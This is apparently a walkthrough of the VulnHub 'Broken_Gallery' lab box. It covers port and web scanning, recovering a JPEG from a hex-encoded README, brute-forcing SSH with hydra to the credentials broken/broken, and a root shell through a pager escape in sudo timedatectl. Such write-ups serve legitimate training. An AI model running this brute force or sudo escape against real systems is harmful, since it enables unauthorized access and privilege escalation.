Broken_Gallery Box


A VulnHub box. To come back from a dead end you need courage and confidence, so come and take on the challenge! The enumeration and information-gathering phase has little noise, but at one point you will hit a dead end, and without binary experience you will have no idea where to start. That section may well be a challenge for you: it does not require much binary knowledge, but you need to know it to build confidence, and a small trick is what gets you the foothold. Privilege escalation should not be hard once you know GTFOBins; the hard part is developing the ability to summarize experience and draw inferences. The box is not exactly beginner-level; it has a bit of difficulty. (Quoted from the Red Team Notes uploader, 红队笔记UP)

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 04:56 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:3B:1C:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds

Two ports are open, 80 and 22. Next, run version and OS detection against them.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 04:57 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00021s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
| 256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
|_ 256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| 55K 2019-08-09 01:20 README.md
| 1.1K 2019-08-09 01:21 gallery.html
| 259K 2019-08-09 01:11 img_5terre.jpg
| 114K 2019-08-09 01:11 img_forest.jpg
| 663K 2019-08-09 01:11 img_lights.jpg
| 8.4K 2019-08-09 01:11 img_mountains.jpg
|_
MAC Address: 00:0C:29:3B:1C:1C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds

The OS is Ubuntu, and port 80 serves a handful of files from a directory listing.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.141
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 04:57 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00019s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:3B:1C:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds

The UDP scan turned up nothing of value.

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.141
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 06:37 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00015s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sql-injection:
| Possible sqli for queries:
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.1.1.141:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|_ http://192.1.1.141:80/?C=M%3BO%3DA%27%20OR%20sqlspider
MAC Address: 00:0C:29:3B:1C:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 322.34 seconds

The nmap vulnerability scripts did not turn up anything valuable either (the "possible sqli" hits are just the directory-listing sort parameters). Next, try nikto.

┌──(kali㉿kali)-[~]
└─$ sudo nikto -h http://192.1.1.141/
[sudo] password for kali:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.1.1.141
+ Target Hostname: 192.1.1.141
+ Target Port: 80
+ Start Time: 2023-06-26 06:20:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing.
+ //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ /%2e/: Directory indexing found.
+ /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. See: http://www.securityfocus.com/bid/2513
+ ///: Directory indexing found.
+ /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269
+ /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when multiple /'s are requested. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /README.md: Readme Found.
+ 8074 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2023-06-26 06:20:14 (GMT-4) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Allowed HTTP Methods: OPTIONS, GET, HEAD, POST. There is no PUT method, so there is no way to upload files. Next, try directory brute-forcing.

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo dirsearch -u http://192.1.1.141/ -r
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.141/-_23-06-26_07-55-16.txt

Error Log: /root/.dirsearch/logs/errors-23-06-26_07-55-16.log

Target: http://192.1.1.141/

[07:55:16] Starting:
[07:55:17] 403 - 297B - /.ht_wsr.txt
[07:55:17] 403 - 301B - /.htaccess_extra
[07:55:17] 403 - 300B - /.htaccess.save
[07:55:17] 403 - 300B - /.htaccess.orig
[07:55:17] 403 - 300B - /.htaccess.bak1
[07:55:17] 403 - 300B - /.htaccess_orig
[07:55:17] 403 - 302B - /.htaccess.sample
[07:55:17] 403 - 298B - /.htaccessBAK
[07:55:17] 403 - 299B - /.htaccessOLD2
[07:55:17] 403 - 298B - /.htaccess_sc
[07:55:17] 403 - 298B - /.htaccessOLD
[07:55:17] 403 - 291B - /.html
[07:55:17] 403 - 290B - /.htm
[07:55:17] 403 - 300B - /.htpasswd_test
[07:55:17] 403 - 296B - /.htpasswds
[07:55:17] 403 - 297B - /.httr-oauth
[07:55:19] 200 - 55KB - /README.md
[07:55:30] 200 - 1KB - /gallery.html
[07:55:39] 403 - 299B - /server-status
[07:55:39] 403 - 300B - /server-status/ (Added to queue)
[07:55:44] Starting: server-status/
[07:55:44] 404 - 285B - /server-status/%2e%2e//google.com

Task Completed

The only two valid results are files that were already visible in the port 80 listing, so directory brute-forcing found nothing new either. Let's focus on the files served on port 80.

Web Exploitation

Download all the files locally and check them for hidden (steganographic) data, using file, binwalk, exiftool and strings in turn.

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ file *
img_5terre.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1200x900, components 3
img_forest.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 750x425, components 3
img_lights.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 2988x1680, components 3
img_mountains.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 314x160, components 3
README.md: CSV text
┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ binwalk *

Scan Time: 2023-06-26 05:05:26
Target File: /home/kali/Downloads/Broken_Gallery/img_5terre.jpg
MD5 Checksum: 5d37289a16584a465eaacb52e58521d4
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01


Scan Time: 2023-06-26 05:05:26
Target File: /home/kali/Downloads/Broken_Gallery/img_forest.jpg
MD5 Checksum: 761a639a8a0e2ddac1818348eba4bc3d
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01


Scan Time: 2023-06-26 05:05:26
Target File: /home/kali/Downloads/Broken_Gallery/img_lights.jpg
MD5 Checksum: dc0703a8dd937fae387b639dc73827c1
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01


Scan Time: 2023-06-26 05:05:26
Target File: /home/kali/Downloads/Broken_Gallery/img_mountains.jpg
MD5 Checksum: 8412b3da2a31506bb24050ba8cf6d413
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01


Scan Time: 2023-06-26 05:05:26
Target File: /home/kali/Downloads/Broken_Gallery/README.md
MD5 Checksum: db082d3bc4489f6fd9258b79154b0965
Signatures: 411

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ exiftool *
======== img_5terre.jpg
ExifTool Version Number : 12.57
File Name : img_5terre.jpg
Directory : .
File Size : 265 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time : 2023:06:26 05:03:28-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Image Width : 1200
Image Height : 900
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:2 (2 1)
Image Size : 1200x900
Megapixels : 1.1
======== img_forest.jpg
ExifTool Version Number : 12.57
File Name : img_forest.jpg
Directory : .
File Size : 117 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time : 2023:06:26 05:03:37-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 750
Image Height : 425
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 750x425
Megapixels : 0.319
======== img_lights.jpg
ExifTool Version Number : 12.57
File Name : img_lights.jpg
Directory : .
File Size : 679 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time : 2023:06:26 05:03:44-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Profile CMM Type : Little CMS
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2012:01:25 03:41:57
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : c2
Profile Copyright : FB
Media White Point : 0.9642 1 0.82491
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Image Width : 2988
Image Height : 1680
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 2988x1680
Megapixels : 5.0
======== img_mountains.jpg
ExifTool Version Number : 12.57
File Name : img_mountains.jpg
Directory : .
File Size : 8.6 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time : 2023:06:26 05:03:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 314
Image Height : 160
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 314x160
Megapixels : 0.050
======== README.md
ExifTool Version Number : 12.57
File Name : README.md
Directory : .
File Size : 57 kB
File Modification Date/Time : 2019:08:09 04:20:02-04:00
File Access Date/Time : 2023:06:26 05:04:52-04:00
File Inode Change Date/Time : 2023:06:26 05:03:09-04:00
File Permissions : -rw-r--r--
File Type : TXT
File Type Extension : txt
MIME Type : text/plain
MIME Encoding : us-ascii
Newlines : Unix LF
Line Count : 584
Word Count : 9335
5 image files read

There is a hint about binary data in a colour channel that can be extracted: Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ exiftool -b img_lights.jpg
12.57img_lights.jpg.6789092019:08:09 04:11:02-04:002023:06:26 05:04:52-04:002023:06:26 05:03:44-04:00100644JPEGJPGimage/jpeg1 1011lcms528mntrRGB XYZ 2012:01:25 03:41:57acspAPPL00 000.9642 1 0.82491lcms0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0c2FB0.9642 1 0.824910.01205 0.0125 0.010310.43607 0.22249 0.013920.38515 0.71687 0.097080.14307 0.06061 0.7141curv▒��ck
�?Q!�)�2▒;�FQw]�kpz���|�i�}���0��curv▒��ck
�?Q!�)�2▒;�FQw]�kpz���|�i�}���0��curv▒��ck
�?Q!�)�2▒;�FQw]�kpz���|�i�}���0��298816800832 22988 16805.01984

Nothing useful there. The metadata also mentions Little CMS; a search shows it is a colour-management library with no obvious vulnerability here. So the focus shifts to the .md file. Opening it reveals that it consists of hexadecimal data.

Just ask ChatGPT what it is.

It turns out to be a JPG file: both the file header and the file trailer match the JPG signature.

ZIP Archive (zip), header: 50 4B 03 04, trailer: 50 4B
RAR Archive (rar), header: 52 61 72 21
JPEG (jpg), header: FF D8 FF, trailer: FF D9
PNG (png), header: 89 50 4E 47, trailer: AE 42 60 82
GIF (gif), header: 47 49 46 38, trailer: 00 3B
TIFF (tif), header: 49 49 2A 00
Windows Bitmap (bmp), header: 42 4D AE 0A 0B
7-ZIP compressed file (7z), header: 37 7A BC AF 27 1C
avi (RIFF), header: 52 49 46 46

Converting the Hex to an Image

Next, the hex has to be turned back into an image. At first I tried doing it in an editor but could not get an image out of it; after some searching I found an online tool, 在线十六进制转图片—LZL在线工具 (lzltool.com), which converted it successfully. The data does need preprocessing first: delete the commas, spaces and 0x prefixes, which Notepad can do, then paste the result into the web page. Just in case, the converted image can also be downloaded and checked again with exiftool and the other tools for hidden data.

The recovered image gives very little: at best a few usernames and an application name. At this point I was somewhat stuck. The earlier directory brute-forcing had produced nothing, so I tried manually, using the words from the image (application, BROEKN, avraham, cohen) as directory names one by one, but none of them led anywhere. I was stuck here for a long time and even tried brute-forcing http://192.1.1.141/icons

If you would rather not use an online site, the following commands convert the hex file back to binary, after which strings and head together give a first idea of the file's content and type (note that xxd -r -p expects bare hex digits, so the commas and 0x prefixes still have to be stripped first):
xxd -r -ps README.md > README.bin
strings README.bin | head -n 20
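As an added example (not code from the original post or from the box), the same clean-up and type check done in Python: it strips the commas, spaces and 0x prefixes the post mentions, decodes the hex, matches the result against the header/trailer signatures listed above, carves out the JPEG span and lists printable strings the way `strings` does. The sample dump below is constructed here and is not the box's real README.md.

```python
import re
from typing import List, Optional, Tuple

# Signatures from the table above: header bytes, plus the trailer where the format
# has a fixed one (JPEG/PNG/GIF). ZIP, RAR, TIFF, 7z and RIFF end in variable data,
# so their trailer is None and not checked.
SIGNATURES: List[Tuple[str, bytes, Optional[bytes]]] = [
    ("ZIP archive", bytes.fromhex("504B0304"), None),
    ("RAR archive", bytes.fromhex("52617221"), None),
    ("JPEG image", bytes.fromhex("FFD8FF"), bytes.fromhex("FFD9")),
    ("PNG image", bytes.fromhex("89504E47"), bytes.fromhex("AE426082")),
    ("GIF image", bytes.fromhex("47494638"), bytes.fromhex("003B")),
    ("TIFF image", bytes.fromhex("49492A00"), None),
    ("7-Zip archive", bytes.fromhex("377ABCAF271C"), None),
    ("RIFF container (avi/wav)", bytes.fromhex("52494646"), None),
]

_HEX_PREFIX = re.compile(r"0[xX]")
_NON_HEX = re.compile(r"[^0-9a-fA-F]")


def hex_dump_to_bytes(text: str) -> bytes:
    """Turn a loosely formatted hex dump ("0xFF, 0xD8, ..." or "ff d8 ...") into bytes.

    This is the clean-up the post does by hand in Notepad: drop the 0x prefixes,
    then every comma, space and newline, and decode what is left.
    """
    cleaned = _NON_HEX.sub("", _HEX_PREFIX.sub("", text))
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits: dump is truncated or corrupt")
    return bytes.fromhex(cleaned)


def identify(data: bytes) -> Optional[str]:
    """Return the format whose header matches the start of data, or None."""
    for name, head, _ in SIGNATURES:
        if data.startswith(head):
            return name
    return None


def trailer_ok(data: bytes) -> Optional[bool]:
    """True/False when the identified format has a fixed trailer and it is/isn't
    present (a False here usually means the dump is truncated); None otherwise."""
    for _, head, tail in SIGNATURES:
        if data.startswith(head):
            return None if tail is None else data.endswith(tail)
    return None


def carve_jpeg(data: bytes) -> Optional[bytes]:
    """Slice out the first FF D8 FF ... last FF D9 span, for when the JPEG is wrapped
    in other bytes (leading junk, a trailing newline from the text file, etc.)."""
    start = data.find(bytes.fromhex("FFD8FF"))
    end = data.rfind(bytes.fromhex("FFD9"))
    if start < 0 or end < start:
        return None
    return data[start:end + 2]


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Minimal stand-in for `strings`: runs of printable ASCII of at least min_len."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Constructed sample: a minimal JFIF APP0 header followed by the end-of-image marker,
# written in the "0x.., 0x.." style the post describes. Not the box's README.md.
SAMPLE_DUMP = """
0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01,
0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0xFF, 0xD9
"""

if __name__ == "__main__":
    blob = hex_dump_to_bytes(SAMPLE_DUMP)
    print(f"{len(blob)} bytes, type: {identify(blob)}, trailer ok: {trailer_ok(blob)}")
    print("strings:", printable_strings(blob))
    jpeg = carve_jpeg(blob)
    if jpeg:
        with open("recovered.jpg", "wb") as fh:  # then inspect with exiftool/binwalk
            fh.write(jpeg)
```

To process the real file, replace SAMPLE_DUMP with the contents of README.md; a False from trailer_ok() is the quickest sign that the paste into a converter lost the tail of the data.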

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo dirsearch -u http://192.1.1.141/icons

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.141/-icons_23-06-26_07-57-03.txt

Error Log: /root/.dirsearch/logs/errors-23-06-26_07-57-03.log

Target: http://192.1.1.141/icons/

[07:57:03] Starting:
[07:57:04] 403 - 303B - /icons/.ht_wsr.txt
[07:57:04] 403 - 308B - /icons/.htaccess.sample
[07:57:04] 403 - 306B - /icons/.htaccess.orig
[07:57:04] 403 - 306B - /icons/.htaccess.bak1
[07:57:04] 403 - 306B - /icons/.htaccess.save
[07:57:04] 403 - 305B - /icons/.htaccessOLD2
[07:57:04] 403 - 306B - /icons/.htaccess_orig
[07:57:04] 403 - 307B - /icons/.htaccess_extra
[07:57:04] 403 - 304B - /icons/.htaccess_sc
[07:57:04] 403 - 304B - /icons/.htaccessBAK
[07:57:04] 403 - 297B - /icons/.html
[07:57:04] 403 - 304B - /icons/.htaccessOLD
[07:57:04] 403 - 296B - /icons/.htm
[07:57:04] 403 - 302B - /icons/.htpasswds
[07:57:04] 403 - 306B - /icons/.htpasswd_test
[07:57:04] 403 - 303B - /icons/.httr-oauth
[07:57:07] 200 - 5KB - /icons/README
[07:57:07] 200 - 35KB - /icons/README.html

SSH Brute-forcing

I had a look at a walkthrough. It turns out the intended route is to take the information gathered so far (the meaningful parts of the image file names, plus the personal names and bolded words in the recovered image), build a wordlist from it, and brute-force SSH... I was speechless at how crude that approach is. It does make sense, but having both the username and the password be BROKEN is a bit absurd (

The Red Team Notes uploader offered a useful perspective here: a box is essentially an abstraction of a real-world environment, so you cannot expect its information to be handed to you in a neat, orderly way, because real environments are even messier. That is an angle I had not considered before.

┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ hydra -L user -P passwd 192.1.1.141 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-26 08:25:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.1.1.141:22/
[22][ssh] host: 192.1.1.141 login: broken password: broken
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-26 08:25:59
┌──(kali㉿kali)-[~/Downloads/Broken_Gallery]
└─$ ssh broken@192.1.1.141
The authenticity of host '192.1.1.141 (192.1.1.141)' can't be established.
ED25519 key fingerprint is SHA256:2rSjxvkij5hWypyT/706pdaI6YAB0AOIXa7kVnMBDZs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.141' (ED25519) to the list of known hosts.
broken@192.1.1.141's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)

* Documentation: https://help.ubuntu.com/

762 packages can be updated.
458 updates are security updates.

Last login: Fri Aug 9 02:40:48 2019 from 10.11.1.221
broken@ubuntu:~$ ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos
broken@ubuntu:~$ whoami
broken
broken@ubuntu:~$ id
uid=1000(broken) gid=1000(broken) groups=1000(broken),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
broken@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
broken@ubuntu:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:3b:1c:1c brd ff:ff:ff:ff:ff:ff
inet 192.1.1.141/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1524sec preferred_lft 1524sec
inet6 fe80::46:b9bd:c17c:f599/64 scope link
valid_lft forever preferred_lft forever
broken@ubuntu:~$ sudo -l
Matching Defaults entries for broken on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User broken may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/timedatectl
(ALL) NOPASSWD: /sbin/reboot

Privilege Escalation

Look up the two sudo entries on GTFOBins.

timedatectl Shell

timedatectl pages its long output through a pager, and from the pager a new shell can be spawned, which inherits the root privileges sudo granted.

broken@ubuntu:~$ sudo timedatectl list-timezones
……
!/bin/bash
root@ubuntu:~# id
